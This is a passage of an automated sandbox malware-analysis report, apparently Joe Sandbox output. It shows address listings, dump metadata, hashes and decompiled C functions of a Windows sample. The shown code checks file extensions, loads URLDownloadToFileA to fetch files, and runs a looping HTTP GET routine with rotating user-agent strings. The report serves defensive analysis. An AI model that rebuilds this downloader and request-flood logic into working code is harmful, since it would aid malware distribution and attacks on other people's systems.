                                                                          0x004030eb
                                                                          0x004030ed
                                                                          0x004030f4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403360
                                                                          0x00403360
                                                                          0x00403363
                                                                          0x00403368
                                                                          0x0040336d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040310f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403118
                                                                          0x0040311d
                                                                          0x0040311d
                                                                          0x00403122
                                                                          0x00403124
                                                                          0x00403124
                                                                          0x00403124
                                                                          0x00403136
                                                                          0x00403143
                                                                          0x00403177
                                                                          0x00403177
                                                                          0x00403180
                                                                          0x00403189
                                                                          0x0040318b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040318d
                                                                          0x0040318d
                                                                          0x0040318d
                                                                          0x00403193
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004031a1
                                                                          0x004031a3
                                                                          0x004031aa
                                                                          0x004031aa
                                                                          0x00403224
                                                                          0x00403227
                                                                          0x0040322c
                                                                          0x00403231
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004031b6
                                                                          0x004031bb
                                                                          0x004031c1
                                                                          0x004031c3
                                                                          0x004031c3
                                                                          0x004031c8
                                                                          0x004031ce
                                                                          0x004031d0
                                                                          0x004031d0
                                                                          0x004031d5
                                                                          0x004031d5
                                                                          0x004031db
                                                                          0x004031dd
                                                                          0x004031dd
                                                                          0x004031eb
                                                                          0x004031ee
                                                                          0x004031f0
                                                                          0x004031f2
                                                                          0x004031f2
                                                                          0x00403203
                                                                          0x00403205
                                                                          0x00403207
                                                                          0x00403207
                                                                          0x0040320e
                                                                          0x00000000
                                                                          0x00403210
                                                                          0x00403210
                                                                          0x00403216
                                                                          0x0040321e
                                                                          0x00000000
                                                                          0x0040321e
                                                                          0x0040320e
                                                                          0x00403233
                                                                          0x00403239
                                                                          0x00403249
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040324f
                                                                          0x00403255
                                                                          0x00403258
                                                                          0x0040325d
                                                                          0x00403263
                                                                          0x004032a4
                                                                          0x004032ae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032b4
                                                                          0x004032be
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032c4
                                                                          0x004032ce
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004032e5
                                                                          0x004032d6
                                                                          0x004032dd
                                                                          0x004032e2
                                                                          0x004032e2
                                                                          0x004032f4
                                                                          0x004032f8
                                                                          0x00403306
                                                                          0x0040330a
                                                                          0x00403312
                                                                          0x0040331a
                                                                          0x00403321
                                                                          0x00403326
                                                                          0x00403329
                                                                          0x00403330
                                                                          0x00403335
                                                                          0x0040333f
                                                                          0x00403341
                                                                          0x0040334b
                                                                          0x00403352
                                                                          0x00403357
                                                                          0x00403357
                                                                          0x0040335a
                                                                          0x0040335a
                                                                          0x00000000
                                                                          0x00403263
                                                                          0x00403147
                                                                          0x00403149
                                                                          0x00403102
                                                                          0x00000000
                                                                          0x00403102
                                                                          0x0040314b
                                                                          0x0040315b
                                                                          0x00403163
                                                                          0x00403168
                                                                          0x0040316d
                                                                          0x00403172
                                                                          0x00403172
                                                                          0x00403177
                                                                          0x00403180
                                                                          0x00403189
                                                                          0x0040318b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040318b
                                                                          0x00403177
                                                                          0x0040337e
                                                                          0x00403383
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Sleepfgetc$fclosefopen$CreateThreadlstrlenrewind
                                                                          • String ID: -
                                                                          • API String ID: 3748466826-2547889144
                                                                          • Opcode ID: 28373200780021fc207e4293904c45f34d67fc74515178610104ffffb636ca7f
                                                                          • Instruction ID: 6d437ecd7483d23b259e28590f61e0e5bcbda088feaf823980ac16ccee795e59
                                                                          • Opcode Fuzzy Hash: 28373200780021fc207e4293904c45f34d67fc74515178610104ffffb636ca7f
                                                                          • Instruction Fuzzy Hash: 287182748043148AD720AF25C4C536EBFA8AF44715F1549BFE885AB3C1DB7C8B848B8B
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 37%
                                                                          			E00403622(signed int __eax, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                          				void* _v16;
                                                                          				char _v300;
                                                                          				intOrPtr _v308;
                                                                          				intOrPtr _v312;
                                                                          				intOrPtr _v324;
                                                                          				intOrPtr _v332;
                                                                          				intOrPtr _v340;
                                                                          				intOrPtr _v348;
                                                                          				intOrPtr _v356;
                                                                          				intOrPtr _v364;
                                                                          				intOrPtr _v372;
                                                                          				intOrPtr _v380;
                                                                          				void* __ebx;
                                                                          				signed int _t32;
                                                                          				char _t37;
                                                                          				char* _t38;
                                                                          				intOrPtr _t41;
                                                                          				signed int _t42;
                                                                          				intOrPtr _t43;
                                                                          				char _t44;
                                                                          				char* _t45;
                                                                          				void* _t46;
                                                                          				intOrPtr* _t47;
                                                                          				intOrPtr* _t48;
                                                                          				intOrPtr* _t49;
                                                                          
                                                                          				_t42 = __edx;
                                                                          				_t32 = __eax;
                                                                          				_t47 = _t46 - 0x12c;
                                                                          				_t43 = _a4;
                                                                          				_t41 = _a8;
                                                                          				_t37 = 0;
                                                                          				_t44 = 0xffffffff;
                                                                          				if( *((char*)(_t41 + 0x2c)) == 0) {
                                                                          					L4:
                                                                          					if(_t44 >= 0) {
                                                                          						_v308 = 0x103;
                                                                          						_v312 = _t41 + _t44 + 0x2d;
                                                                          						_t38 =  &_v300;
                                                                          						 *_t47 = _t38;
                                                                          						L0040C350();
                                                                          						_t48 = _t47 - 0xc;
                                                                          						 *_t48 = _t38;
                                                                          						_t32 = CharLowerA(??);
                                                                          						_t47 = _t48 - 4;
                                                                          					} else {
                                                                          						_v300 = 0;
                                                                          					}
                                                                          					_v324 = 0x40efb2;
                                                                          					_t45 =  &_v300;
                                                                          					 *_t47 = _t45;
                                                                          					L0040C318();
                                                                          					_t49 = _t47 - 8;
                                                                          					if(_t32 == 0) {
                                                                          						L15:
                                                                          						 *_t49 = _t43;
                                                                          						_t32 =  ~((E00402F2E(1, _t42) & 0xffffff00 | _t34 != 0x00000000) & 0x000000ff);
                                                                          						if((0x00000001 & _t32) == 1) {
                                                                          							 *_t49 = _t43;
                                                                          							_t32 = E0040307E(_t42);
                                                                          						}
                                                                          						goto L17;
                                                                          					} else {
                                                                          						_v332 = 0x40efb7;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v340 = 0x40efbb;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v348 = 0x40efbf;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v356 = 0x40efc3;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v364 = 0x40efc7;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v372 = 0x40ee83;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 == 0) {
                                                                          							goto L15;
                                                                          						}
                                                                          						_v380 = 0x40efca;
                                                                          						 *_t49 = _t45;
                                                                          						L0040C318();
                                                                          						_t49 = _t49 - 8;
                                                                          						if(_t32 != 0) {
                                                                          							L17:
                                                                          							return _t32;
                                                                          						}
                                                                          						goto L15;
                                                                          					}
                                                                          				} else {
                                                                          					goto L1;
                                                                          				}
                                                                          				do {
                                                                          					L1:
                                                                          					if( *((char*)(_t41 + _t37 + 0x2c)) == 0x2e) {
                                                                          						_t44 = _t37;
                                                                          					}
                                                                          					_t37 = _t37 + 1;
                                                                          					_t42 = _t42 & 0xffffff00 |  *((char*)(_t41 + _t37 + 0x2c)) != 0x00000000;
                                                                          					_t32 = _t32 & 0xffffff00 | _t37 - 0x000000fe <= 0x00000000;
                                                                          				} while ((_t42 & _t32) != 0);
                                                                          				goto L4;
                                                                          			}




























                                                                          0x00403622
                                                                          0x00403622
                                                                          0x00403628
                                                                          0x0040362e
                                                                          0x00403631
                                                                          0x00403634
                                                                          0x00403639
                                                                          0x00403642
                                                                          0x00403663
                                                                          0x00403665
                                                                          0x00403670
                                                                          0x0040367c
                                                                          0x00403680
                                                                          0x00403686
                                                                          0x00403689
                                                                          0x0040368e
                                                                          0x00403691
                                                                          0x00403694
                                                                          0x00403699
                                                                          0x00403667
                                                                          0x00403667
                                                                          0x00403667
                                                                          0x004036a1
                                                                          0x004036a9
                                                                          0x004036af
                                                                          0x004036b2
                                                                          0x004036b7
                                                                          0x004036bc
                                                                          0x00403767
                                                                          0x00403767
                                                                          0x00403777
                                                                          0x0040377e
                                                                          0x00403780
                                                                          0x00403783
                                                                          0x00403783
                                                                          0x00000000
                                                                          0x004036c2
                                                                          0x004036c2
                                                                          0x004036ca
                                                                          0x004036cd
                                                                          0x004036d2
                                                                          0x004036d7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004036dd
                                                                          0x004036e5
                                                                          0x004036e8
                                                                          0x004036ed
                                                                          0x004036f2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004036f4
                                                                          0x004036fc
                                                                          0x004036ff
                                                                          0x00403704
                                                                          0x00403709
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040370b
                                                                          0x00403713
                                                                          0x00403716
                                                                          0x0040371b
                                                                          0x00403720
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403722
                                                                          0x0040372a
                                                                          0x0040372d
                                                                          0x00403732
                                                                          0x00403737
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403739
                                                                          0x00403741
                                                                          0x00403744
                                                                          0x00403749
                                                                          0x0040374e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403750
                                                                          0x00403758
                                                                          0x0040375b
                                                                          0x00403760
                                                                          0x00403765
                                                                          0x00403788
                                                                          0x0040378f
                                                                          0x0040378f
                                                                          0x00000000
                                                                          0x00403765
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00403644
                                                                          0x00403644
                                                                          0x00403649
                                                                          0x0040364b
                                                                          0x0040364b
                                                                          0x0040364d
                                                                          0x00403653
                                                                          0x0040365c
                                                                          0x0040365f
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmp$CharLowerlstrcpyn
                                                                          • String ID: C:\$doc$htm$html$php$tbb$txt$xml
                                                                          • API String ID: 838419190-312059954
                                                                          • Opcode ID: dc05e5cdd392e04bc51eba1f7065f56e4f2167f4d31b7c461c5834b6df2cda79
                                                                          • Instruction ID: 6961f7bd5c8fa27dba0ec7a422f8e7192e07f4a6a10a31976eaf7852eedd0230
                                                                          • Opcode Fuzzy Hash: dc05e5cdd392e04bc51eba1f7065f56e4f2167f4d31b7c461c5834b6df2cda79
                                                                          • Instruction Fuzzy Hash: FE31B1B44047409AC7107F368A8526E7EE89B4078DF01897FEC80676C2D73C8A59CB9F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AddressDeleteDirectoryFileFreeLoadProcSystem_mbscatlstrcatlstrlen
                                                                          • String ID: D$D$URLDownloadToFileA$urlmon.dll
                                                                          • API String ID: 2488436691-568779862
                                                                          • Opcode ID: ebe57cb0f9589f4619213900ffa154d24ec79a2706f185bd2996470c07c04b7e
                                                                          • Instruction ID: 6020ed59d1fb2f3a26d031d0468f3da87cf9bf9a4133c77db0aeb5110a75bae0
                                                                          • Opcode Fuzzy Hash: ebe57cb0f9589f4619213900ffa154d24ec79a2706f185bd2996470c07c04b7e
                                                                          • Instruction Fuzzy Hash: F451E0B0804744CBD750EF29D98579EBBF0BF44314F404A6EE8899B381D7789688CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E00402120(intOrPtr _a4) {
                                                                          				intOrPtr _v76;
                                                                          				char _v82;
                                                                          				short _v84;
                                                                          				intOrPtr _v88;
                                                                          				char _v92;
                                                                          				intOrPtr _v104;
                                                                          				intOrPtr _t53;
                                                                          				intOrPtr _t54;
                                                                          				intOrPtr _t55;
                                                                          				intOrPtr _t56;
                                                                          				intOrPtr _t57;
                                                                          				intOrPtr _t58;
                                                                          				intOrPtr _t59;
                                                                          				intOrPtr _t60;
                                                                          				signed int _t64;
                                                                          				signed int _t67;
                                                                          				signed int _t68;
                                                                          				void* _t69;
                                                                          				short* _t70;
                                                                          				signed int _t71;
                                                                          				intOrPtr _t72;
                                                                          				void* _t73;
                                                                          				void* _t74;
                                                                          				intOrPtr* _t75;
                                                                          
                                                                          				_t72 = _a4;
                                                                          				_t69 =  &_v92;
                                                                          				asm("cld");
                                                                          				memset(_t69, 0, 3 << 2);
                                                                          				_t75 = _t74 + 0xc;
                                                                          				_t70 = _t69 + 3;
                                                                          				 *_t70 = 0;
                                                                          				 *((char*)(_t70 + 2)) = 0;
                                                                          				_v92 = 0x6b6c7665;
                                                                          				_v88 = 0x686f6472;
                                                                          				_v84 = 0x706c;
                                                                          				_v82 = 0;
                                                                          				_t9 =  &_v92; // 0x6b6c7665
                                                                          				_v104 = _t9;
                                                                          				 *_t75 = 0x40e44a;
                                                                          				E00404C6A();
                                                                          				E00402106();
                                                                          				_t64 =  *0x414008;
                                                                          				_t71 = 0;
                                                                          				do {
                                                                          					_t67 = _t64 * 0xcccccccd >> 0x20 >> 3;
                                                                          					 *((intOrPtr*)(_t73 + _t71 * 4 - 0x48)) = _t64 - _t67 + _t67 * 4 + _t67 + _t67 * 4;
                                                                          					_t64 = _t67;
                                                                          					_t71 = _t71 + 1;
                                                                          				} while (_t71 <= 9);
                                                                          				_t68 = 0;
                                                                          				do {
                                                                          					 *((char*)(_t68 + _t72)) =  *( *((intOrPtr*)(_t73 + _t68 * 4 - 0x48)) +  &_v92) & 0x000000ff;
                                                                          					_t68 = _t68 + 1;
                                                                          				} while (_t68 <= 9);
                                                                          				 *((char*)(_t72 + 0xa)) = 0;
                                                                          				if(_v76 != 0) {
                                                                          					if(_v76 != 1) {
                                                                          						if(_v76 != 2) {
                                                                          							if(_v76 != 3) {
                                                                          								if(_v76 != 4) {
                                                                          									if(_v76 != 5) {
                                                                          										if(_v76 != 6) {
                                                                          											_t53 =  *0x40d07c; // 0x40e446
                                                                          											_v104 = _t53;
                                                                          											 *_t75 = _t72;
                                                                          											L0040C208();
                                                                          											return _t53;
                                                                          										}
                                                                          										_t54 =  *0x40d078; // 0x40e440
                                                                          										_v104 = _t54;
                                                                          										 *_t75 = _t72;
                                                                          										L0040C208();
                                                                          										return _t54;
                                                                          									}
                                                                          									_t55 =  *0x40d074; // 0x40e43c
                                                                          									_v104 = _t55;
                                                                          									 *_t75 = _t72;
                                                                          									L0040C208();
                                                                          									return _t55;
                                                                          								}
                                                                          								_t56 =  *0x40d070; // 0x40e437
                                                                          								_v104 = _t56;
                                                                          								 *_t75 = _t72;
                                                                          								L0040C208();
                                                                          								return _t56;
                                                                          							}
                                                                          							_t57 =  *0x40d06c; // 0x40e432
                                                                          							_v104 = _t57;
                                                                          							 *_t75 = _t72;
                                                                          							L0040C208();
                                                                          							return _t57;
                                                                          						}
                                                                          						_t58 =  *0x40d068; // 0x40e42e
                                                                          						_v104 = _t58;
                                                                          						 *_t75 = _t72;
                                                                          						L0040C208();
                                                                          						return _t58;
                                                                          					}
                                                                          					_t59 =  *0x40d064; // 0x40e429
                                                                          					_v104 = _t59;
                                                                          					 *_t75 = _t72;
                                                                          					L0040C208();
                                                                          					return _t59;
                                                                          				}
                                                                          				_t60 =  *0x40d060; // 0x40e424
                                                                          				_v104 = _t60;
                                                                          				 *_t75 = _t72;
                                                                          				L0040C208();
                                                                          				return _t60;
                                                                          			}



























                                                                          0x00402129
                                                                          0x0040212c
                                                                          0x0040212f
                                                                          0x0040213a
                                                                          0x0040213a
                                                                          0x0040213a
                                                                          0x0040213c
                                                                          0x00402141
                                                                          0x00402145
                                                                          0x0040214c
                                                                          0x00402153
                                                                          0x00402159
                                                                          0x0040215d
                                                                          0x00402160
                                                                          0x00402164
                                                                          0x0040216b
                                                                          0x00402170
                                                                          0x00402175
                                                                          0x0040217b
                                                                          0x00402185
                                                                          0x00402189
                                                                          0x00402193
                                                                          0x00402197
                                                                          0x00402199
                                                                          0x0040219a
                                                                          0x0040219f
                                                                          0x004021a4
                                                                          0x004021ad
                                                                          0x004021b0
                                                                          0x004021b1
                                                                          0x004021b6
                                                                          0x004021be
                                                                          0x004021da
                                                                          0x004021f6
                                                                          0x0040220f
                                                                          0x00402228
                                                                          0x00402241
                                                                          0x0040225a
                                                                          0x0040226f
                                                                          0x00402274
                                                                          0x00402278
                                                                          0x0040227b
                                                                          0x00000000
                                                                          0x0040227b
                                                                          0x0040225c
                                                                          0x00402261
                                                                          0x00402265
                                                                          0x00402268
                                                                          0x00000000
                                                                          0x00402268
                                                                          0x00402243
                                                                          0x00402248
                                                                          0x0040224c
                                                                          0x0040224f
                                                                          0x00000000
                                                                          0x0040224f
                                                                          0x0040222a
                                                                          0x0040222f
                                                                          0x00402233
                                                                          0x00402236
                                                                          0x00000000
                                                                          0x00402236
                                                                          0x00402211
                                                                          0x00402216
                                                                          0x0040221a
                                                                          0x0040221d
                                                                          0x00000000
                                                                          0x0040221d
                                                                          0x004021f8
                                                                          0x004021fd
                                                                          0x00402201
                                                                          0x00402204
                                                                          0x00000000
                                                                          0x00402204
                                                                          0x004021dc
                                                                          0x004021e1
                                                                          0x004021e5
                                                                          0x004021e8
                                                                          0x00000000
                                                                          0x004021e8
                                                                          0x004021c0
                                                                          0x004021c5
                                                                          0x004021c9
                                                                          0x004021cc
                                                                          0x00000000

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: _mbscat
                                                                          • String ID: $@$)@$.@$2@$7@$<@$@@$F@$evlkrdohlp
                                                                          • API String ID: 134015809-3435826350
                                                                          • Opcode ID: c12f48e13e570ad5b0255dc16d45f781d8719ac7601166f7755f4ed953bb1293
                                                                          • Instruction ID: 21a54818e9aca3eeccc7b18a3caaa5206cc12068587b62876ebf60fed946ae37
                                                                          • Opcode Fuzzy Hash: c12f48e13e570ad5b0255dc16d45f781d8719ac7601166f7755f4ed953bb1293
                                                                          • Instruction Fuzzy Hash: 7D411A70E04244DBCB509FA9D68565EBBF0AB45708F10457FE498AB3C1D3789986CB4A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 27%
                                                                          			E00406A48(void* __eflags, intOrPtr* _a4) {
                                                                          				void* _v16;
                                                                          				char _v1052;
                                                                          				intOrPtr _v1068;
                                                                          				intOrPtr _v1072;
                                                                          				intOrPtr _v1076;
                                                                          				intOrPtr _v1080;
                                                                          				intOrPtr _v1084;
                                                                          				char* _v1100;
                                                                          				char* _v1104;
                                                                          				char* _v1108;
                                                                          				char* _v1112;
                                                                          				char* _v1116;
                                                                          				char* _v1120;
                                                                          				char* _v1124;
                                                                          				char* _v1128;
                                                                          				char* _v1132;
                                                                          				intOrPtr _v1144;
                                                                          				intOrPtr _v1148;
                                                                          				intOrPtr _v1152;
                                                                          				char _v1156;
                                                                          				char* _v1160;
                                                                          				void* __ebx;
                                                                          				signed int _t39;
                                                                          				char _t45;
                                                                          				intOrPtr* _t49;
                                                                          				char _t50;
                                                                          				intOrPtr _t51;
                                                                          				char _t63;
                                                                          				char _t64;
                                                                          				void* _t65;
                                                                          				void* _t66;
                                                                          				intOrPtr* _t67;
                                                                          				intOrPtr* _t69;
                                                                          				intOrPtr* _t70;
                                                                          
                                                                          				_t67 = _t66 - 0x47c;
                                                                          				_t49 = _a4;
                                                                          				_v1132 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)";
                                                                          				_v1128 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)";
                                                                          				_v1124 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)";
                                                                          				_v1120 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)";
                                                                          				_v1116 = "Opera/9.64 (Windows NT 5.1; U; ru) Presto/2.1.1";
                                                                          				_v1112 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)";
                                                                          				_v1108 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)";
                                                                          				_v1104 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
                                                                          				_v1100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)";
                                                                          				 *_t67 = 9;
                                                                          				_t39 = E00404EAE();
                                                                          				_t51 =  *_t49;
                                                                          				_v1084 = _t51;
                                                                          				_t63 =  *((intOrPtr*)(_t49 + 4));
                                                                          				_v1080 = _t63;
                                                                          				_v1076 =  *((intOrPtr*)(_t49 + 8));
                                                                          				_v1072 =  *((intOrPtr*)(_t49 + 0xc));
                                                                          				_v1068 =  *((intOrPtr*)(_t49 + 0x10));
                                                                          				_v1148 = _t51;
                                                                          				_v1152 =  *((intOrPtr*)(_t65 + _t39 * 4 - 0x468));
                                                                          				_v1156 = _t63;
                                                                          				_v1160 = "GET %s HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\n";
                                                                          				_t50 =  &_v1052;
                                                                          				 *_t67 = _t50;
                                                                          				wsprintfA(??, ??);
                                                                          				asm("cld");
                                                                          				asm("repne scasb");
                                                                          				 *((short*)(0xffffffff + _t50)) = 0xa0d;
                                                                          				 *((char*)(0xbadbac + _t50 + 2)) = 0;
                                                                          				_t64 = _t50;
                                                                          				while(1) {
                                                                          					_t45 = E00405434(_v1084, _t50, _v1084, _v1076);
                                                                          					_t50 = _t45;
                                                                          					if(_t45 == 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					asm("cld");
                                                                          					asm("repne scasb");
                                                                          					_v1144 = 0;
                                                                          					_v1148 = 0xbadbac;
                                                                          					_v1152 = _t64;
                                                                          					_v1156 = _t50;
                                                                          					L004086B0();
                                                                          					_t69 = _t67 - 0x10;
                                                                          					 *_t69 = _t50;
                                                                          					L004086C0();
                                                                          					_t70 = _t69 - 4;
                                                                          					 *_t70 = _v1068;
                                                                          					Sleep(??);
                                                                          					_t67 = _t70 - 4;
                                                                          				}
                                                                          				return 0;
                                                                          			}





































                                                                          0x00406a4e
                                                                          0x00406a54
                                                                          0x00406a57
                                                                          0x00406a61
                                                                          0x00406a6b
                                                                          0x00406a75
                                                                          0x00406a7f
                                                                          0x00406a89
